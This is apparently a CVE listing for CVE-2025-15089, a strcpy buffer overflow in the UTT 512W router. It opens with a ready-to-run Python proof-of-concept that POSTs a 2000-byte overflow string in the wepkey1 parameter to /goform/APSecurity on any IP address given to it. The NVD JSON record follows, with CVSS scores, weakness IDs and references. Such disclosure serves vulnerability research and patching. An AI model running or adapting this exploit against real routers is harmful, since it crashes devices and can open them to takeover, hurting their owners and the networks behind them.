CVE-2025-15089

#!/usr/bin/env python3 """ CVE-2025-15089 PoC - UTT 进取 512W Buffer Overflow in /goform/APSecurity Vulnerability: strcpy buffer overflow via wepkey1 parameter CVSS: 8.8 (High) """ import requests import sys def exploit_buffer_overflow(target_ip, target_port=80): """ Exploit the buffer overflow vulnerability in UTT 进取 512W router via the wepkey1 parameter in /goform/APSecurity endpoint. Args: target_ip: Target router IP address target_port: Target HTTP port (default: 80) """ url = f"http://{target_ip}:{target_port}/goform/APSecurity" # Buffer overflow payload - 2000 bytes to overflow the buffer # The exact offset may vary, adjust based on firmware version overflow_payload = "A" * 2000 # Construct the POST data with malicious wepkey1 parameter data = { "wepkey1": overflow_payload, "security_mode": "wep", "wepAuthType": "open" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } try: print(f"[*] Sending exploit payload to {url}") print(f"[*] Payload length: {len(overflow_payload)} bytes") response = requests.post(url, data=data, headers=headers, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[*] Response Length: {len(response.text)} bytes") # Check if the device crashed or responded unexpectedly if response.status_code != 200: print("[!] Device may have crashed or returned error") return True except requests.exceptions.Timeout: print("[!] Request timed out - device may have crashed") return True except requests.exceptions.ConnectionError: print("[!] Connection error - device may be down or crashed") return True except Exception as e: print(f"[!] Error: {str(e)}") return False return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") print(f"Example: {sys.argv[0]} 192.168.1.1 80") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 print("=" * 60) print("CVE-2025-15089 PoC - UTT 进取 512W Buffer Overflow") print("=" * 60) success = exploit_buffer_overflow(target, port) if success: print("\n[!] Exploit sent - verify device status") else: print("\n[*] Exploit completed - check results manually")

{"cve": {"id": "CVE-2025-15089", "sourceIdentifier": "[email protected]", "published": "2025-12-25T23:15:41.093", "lastModified": "2025-12-31T18:56:07.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in UTT 进取 512W up to 1.7.7-171114. This affects the function strcpy of the file /goform/APSecurity. The manipulation of the argument wepkey1 leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-171114", "matchCriteriaId": "962A8F4C-6C57-4682-AF35-16B98ABE7890"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "43C0782C-5F34-44B8-9A45-DF3A6121D668"}]}]}], "references": [{"url": "https://github.com/cymiao1978/cve/blob/main/new/14.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/new/14.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338418", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338418", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.708348", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}